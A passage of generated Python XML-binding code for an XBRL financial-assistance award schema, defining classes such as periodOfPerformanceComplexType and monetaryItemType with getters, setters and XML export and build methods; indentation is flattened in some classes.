            obj_.original_tagname_ = 'awardeeUniqueIdentifier'
        elif nodeName_ == 'awardeeUniqueIdentifierSupplemental':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.awardeeUniqueIdentifierSupplemental = obj_
            obj_.original_tagname_ = 'awardeeUniqueIdentifierSupplemental'
        elif nodeName_ == 'ultimateParentLegalBusinessName':
            obj_ = stringItemType.factory()
            obj_.build(child_)
            self.ultimateParentLegalBusinessName = obj_
            obj_.original_tagname_ = 'ultimateParentLegalBusinessName'
        elif nodeName_ == 'awardeeAddress':
            obj_ = addressComplexType.factory()
            obj_.build(child_)
            self.awardeeAddress = obj_
            obj_.original_tagname_ = 'awardeeAddress'
# end class awardeeInformationComplexType
class periodOfPerformanceComplexType(GeneratedsSuper):
subclass = None
superclass = None
    def __init__(self, id=None, periodOfPerformanceActionDate=None, periodOfPerformanceStartDate=None, periodOfPerformanceCurrentEndDate=None, periodOfPerformancePotentialEndDate=None):
        """Store the optional ``id`` attribute and the four
        period-of-performance date children; ``original_tagname_`` starts
        as None and is assigned by the builder that parses this object."""
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.periodOfPerformanceActionDate = periodOfPerformanceActionDate
        self.periodOfPerformanceStartDate = periodOfPerformanceStartDate
        self.periodOfPerformanceCurrentEndDate = periodOfPerformanceCurrentEndDate
        self.periodOfPerformancePotentialEndDate = periodOfPerformancePotentialEndDate
def factory(*args_, **kwargs_):
if periodOfPerformanceComplexType.subclass:
return periodOfPerformanceComplexType.subclass(*args_, **kwargs_)
else:
return periodOfPerformanceComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_periodOfPerformanceActionDate(self): return self.periodOfPerformanceActionDate
def set_periodOfPerformanceActionDate(self, periodOfPerformanceActionDate): self.periodOfPerformanceActionDate = periodOfPerformanceActionDate
def get_periodOfPerformanceStartDate(self): return self.periodOfPerformanceStartDate
def set_periodOfPerformanceStartDate(self, periodOfPerformanceStartDate): self.periodOfPerformanceStartDate = periodOfPerformanceStartDate
def get_periodOfPerformanceCurrentEndDate(self): return self.periodOfPerformanceCurrentEndDate
def set_periodOfPerformanceCurrentEndDate(self, periodOfPerformanceCurrentEndDate): self.periodOfPerformanceCurrentEndDate = periodOfPerformanceCurrentEndDate
def get_periodOfPerformancePotentialEndDate(self): return self.periodOfPerformancePotentialEndDate
def set_periodOfPerformancePotentialEndDate(self, periodOfPerformancePotentialEndDate): self.periodOfPerformancePotentialEndDate = periodOfPerformancePotentialEndDate
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.periodOfPerformanceActionDate is not None or
self.periodOfPerformanceStartDate is not None or
self.periodOfPerformanceCurrentEndDate is not None or
self.periodOfPerformancePotentialEndDate is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='periodOfPerformanceComplexType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:award="http://www.xbrl.org/int/award/2006-10-25" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='periodOfPerformanceComplexType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='periodOfPerformanceComplexType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='periodOfPerformanceComplexType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (self.gds_format_string(quote_attrib(self.id).encode(ExternalEncoding), input_name='id'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='periodOfPerformanceComplexType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.periodOfPerformanceActionDate is not None:
self.periodOfPerformanceActionDate.export(outfile, level, namespace_='award:', name_='periodOfPerformanceActionDate', pretty_print=pretty_print)
if self.periodOfPerformanceStartDate is not None:
self.periodOfPerformanceStartDate.export(outfile, level, namespace_='award:', name_='periodOfPerformanceStartDate', pretty_print=pretty_print)
if self.periodOfPerformanceCurrentEndDate is not None:
self.periodOfPerformanceCurrentEndDate.export(outfile, level, namespace_='award:', name_='periodOfPerformanceCurrentEndDate', pretty_print=pretty_print)
if self.periodOfPerformancePotentialEndDate is not None:
self.periodOfPerformancePotentialEndDate.export(outfile, level, namespace_='award:', name_='periodOfPerformancePotentialEndDate', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'periodOfPerformanceActionDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformanceActionDate = obj_
obj_.original_tagname_ = 'periodOfPerformanceActionDate'
elif nodeName_ == 'periodOfPerformanceStartDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformanceStartDate = obj_
obj_.original_tagname_ = 'periodOfPerformanceStartDate'
elif nodeName_ == 'periodOfPerformanceCurrentEndDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformanceCurrentEndDate = obj_
obj_.original_tagname_ = 'periodOfPerformanceCurrentEndDate'
elif nodeName_ == 'periodOfPerformancePotentialEndDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.periodOfPerformancePotentialEndDate = obj_
obj_.original_tagname_ = 'periodOfPerformancePotentialEndDate'
# end class periodOfPerformanceComplexType
class decimalItemType(GeneratedsSuper):
    """XBRL decimal fact: simple text content plus unit/context attributes."""
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Defer to a registered subclass when one has been installed.
        cls_ = decimalItemType.subclass or decimalItemType
        return cls_(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple-content item has content iff its text value is truthy.
        return True if self.valueOf_ else False
    def export(self, outfile, level, namespace_='finassist:', name_='decimalItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text content) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, ' ' + namespacedef_ if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='decimalItemType')
        if not self.hasContent_():
            # Empty element: self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='decimalItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='decimalItemType'):
        # Write each attribute at most once, in schema order.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            attr_value_ = getattr(self, attr_name_)
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='decimalItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to emit.
        pass
    def build(self, node):
        """Populate this object from an element-tree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            node_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, node_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Attribute names match instance-attribute names, so set them generically.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class decimalItemType
class floatItemType(GeneratedsSuper):
    """XBRL float fact: simple text content plus unit/context attributes."""
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Defer to a registered subclass when one has been installed.
        cls_ = floatItemType.subclass or floatItemType
        return cls_(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple-content item has content iff its text value is truthy.
        return True if self.valueOf_ else False
    def export(self, outfile, level, namespace_='finassist:', name_='floatItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text content) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, ' ' + namespacedef_ if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='floatItemType')
        if not self.hasContent_():
            # Empty element: self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='floatItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='floatItemType'):
        # Write each attribute at most once, in schema order.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            attr_value_ = getattr(self, attr_name_)
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='floatItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to emit.
        pass
    def build(self, node):
        """Populate this object from an element-tree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            node_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, node_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Attribute names match instance-attribute names, so set them generically.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class floatItemType
class doubleItemType(GeneratedsSuper):
    """XBRL double fact: simple text content plus unit/context attributes."""
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Defer to a registered subclass when one has been installed.
        cls_ = doubleItemType.subclass or doubleItemType
        return cls_(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple-content item has content iff its text value is truthy.
        return True if self.valueOf_ else False
    def export(self, outfile, level, namespace_='finassist:', name_='doubleItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text content) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, ' ' + namespacedef_ if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='doubleItemType')
        if not self.hasContent_():
            # Empty element: self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='doubleItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='doubleItemType'):
        # Write each attribute at most once, in schema order.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            attr_value_ = getattr(self, attr_name_)
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='doubleItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to emit.
        pass
    def build(self, node):
        """Populate this object from an element-tree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            node_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, node_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Attribute names match instance-attribute names, so set them generically.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class doubleItemType
class monetaryItemType(GeneratedsSuper):
    """XBRL monetary fact: simple text content plus unit/context attributes.

    Unlike the sibling numeric item types, this one supports xsi:type
    extension via the extensiontype_ slot.
    """
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None, extensiontype_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
        self.extensiontype_ = extensiontype_
    def factory(*args_, **kwargs_):
        # Defer to a registered subclass when one has been installed.
        cls_ = monetaryItemType.subclass or monetaryItemType
        return cls_(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def get_extensiontype_(self):
        return self.extensiontype_
    def set_extensiontype_(self, extensiontype_):
        self.extensiontype_ = extensiontype_
    def hasContent_(self):
        # A simple-content item has content iff its text value is truthy.
        return True if self.valueOf_ else False
    def export(self, outfile, level, namespace_='finassist:', name_='monetaryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text content) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, ' ' + namespacedef_ if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='monetaryItemType')
        if not self.hasContent_():
            # Empty element: self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='monetaryItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='monetaryItemType'):
        # Write each attribute at most once, in schema order.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            attr_value_ = getattr(self, attr_name_)
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_)))
        # An extension type additionally declares the xsi namespace inline.
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='monetaryItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to emit.
        pass
    def build(self, node):
        """Populate this object from an element-tree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            node_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, node_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Attribute names match instance-attribute names, so set them generically.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
        # xsi:type is stored separately in extensiontype_.
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class monetaryItemType
class sharesItemType(GeneratedsSuper):
    """XBRL shares fact: simple text content plus unit/context attributes."""
    subclass = None
    superclass = None
    def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
        self.original_tagname_ = None
        self.unitRef = _cast(None, unitRef)
        self.decimals = _cast(None, decimals)
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.precision = _cast(None, precision)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Defer to a registered subclass when one has been installed.
        cls_ = sharesItemType.subclass or sharesItemType
        return cls_(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_decimals(self):
        return self.decimals
    def set_decimals(self, decimals):
        self.decimals = decimals
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_precision(self):
        return self.precision
    def set_precision(self, precision):
        self.precision = precision
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # A simple-content item has content iff its text value is truthy.
        return True if self.valueOf_ else False
    def export(self, outfile, level, namespace_='finassist:', name_='sharesItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (tag, attributes, text content) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, ' ' + namespacedef_ if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='sharesItemType')
        if not self.hasContent_():
            # Empty element: self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='sharesItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='sharesItemType'):
        # Write each attribute at most once, in schema order.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            attr_value_ = getattr(self, attr_name_)
            if attr_value_ is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                outfile.write(' %s=%s' % (attr_name_, quote_attrib(attr_value_)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='sharesItemType', fromsubclass_=False, pretty_print=True):
        # Simple content only: no child elements to emit.
        pass
    def build(self, node):
        """Populate this object from an element-tree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            node_name_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, node_name_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Attribute names match instance-attribute names, so set them generically.
        for attr_name_ in ('unitRef', 'decimals', 'id', 'contextRef', 'precision'):
            value = find_attr_value_(attr_name_, node)
            if value is not None and attr_name_ not in already_processed:
                already_processed.add(attr_name_)
                setattr(self, attr_name_, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content only: child elements are ignored.
        pass
# end class sharesItemType
class pureItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, unitRef=None, decimals=None, id=None, contextRef=None, precision=None, valueOf_=None):
self.original_tagname_ = None
self.unitRef = _cast(None, unitRef)
self.decimals = _cast(None, decimals)
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.precision = _cast(None, precision)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if pureItemType.subclass:
return pureItemType.subclass(*args_, **kwargs_)
else:
return pureItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitRef(self): return self.unitRef
def set_unitRef(self, unitRef): self.unitRef = unitRef
def get_decimals(self): return self.decimals
def set_decimals(self, decimals): self.decimals = decimals
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_precision(self): return self.precision
def set_precision(self, precision): self.precision = precision
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='pureItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='pureItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='pureItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='pureItemType'):
if self.unitRef is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
outfile.write(' unitRef=%s' % (quote_attrib(self.unitRef), ))
if self.decimals is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
outfile.write(' decimals=%s' % (quote_attrib(self.decimals), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
if self.precision is not None and 'precision' not in already_processed:
already_processed.add('precision')
outfile.write(' precision=%s' % (quote_attrib(self.precision), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='pureItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('unitRef', node)
if value is not None and 'unitRef' not in already_processed:
already_processed.add('unitRef')
self.unitRef = value
value = find_attr_value_('decimals', node)
if value is not None and 'decimals' not in already_processed:
already_processed.add('decimals')
self.decimals = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
value = find_attr_value_('precision', node)
if value is not None and 'precision' not in already_processed:
already_processed.add('precision')
self.precision = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """No-op: pureItemType has no child elements to parse."""
        pass
# end class pureItemType
class fractionItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``fractionItemType`` item.

    A fraction is expressed through two child elements, ``numerator`` and
    ``denominator``, plus the standard XBRL item attributes unitRef, id
    and contextRef.
    """
    subclass = None
    superclass = None
    # Attribute names, in the order the generated schema emits them.
    _item_attrs = ('unitRef', 'id', 'contextRef')
    def __init__(self, unitRef=None, id=None, contextRef=None, numerator=None, denominator=None):
        self.original_tagname_ = None
        for name, value in zip(self._item_attrs, (unitRef, id, contextRef)):
            setattr(self, name, _cast(None, value))
        self.numerator = numerator
        self.denominator = denominator
    @staticmethod
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one has been installed.
        target = fractionItemType.subclass or fractionItemType
        return target(*args_, **kwargs_)
    def get_numerator(self):
        return self.numerator
    def set_numerator(self, numerator):
        self.numerator = numerator
    def get_denominator(self):
        return self.denominator
    def set_denominator(self, denominator):
        self.denominator = denominator
    def get_unitRef(self):
        return self.unitRef
    def set_unitRef(self, unitRef):
        self.unitRef = unitRef
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def hasContent_(self):
        # Content exists when either child element is populated.
        return self.numerator is not None or self.denominator is not None
    def export(self, outfile, level, namespace_='finassist:', name_='fractionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
        """Serialize this element (attributes and child elements) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='fractionItemType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_,))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='fractionItemType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
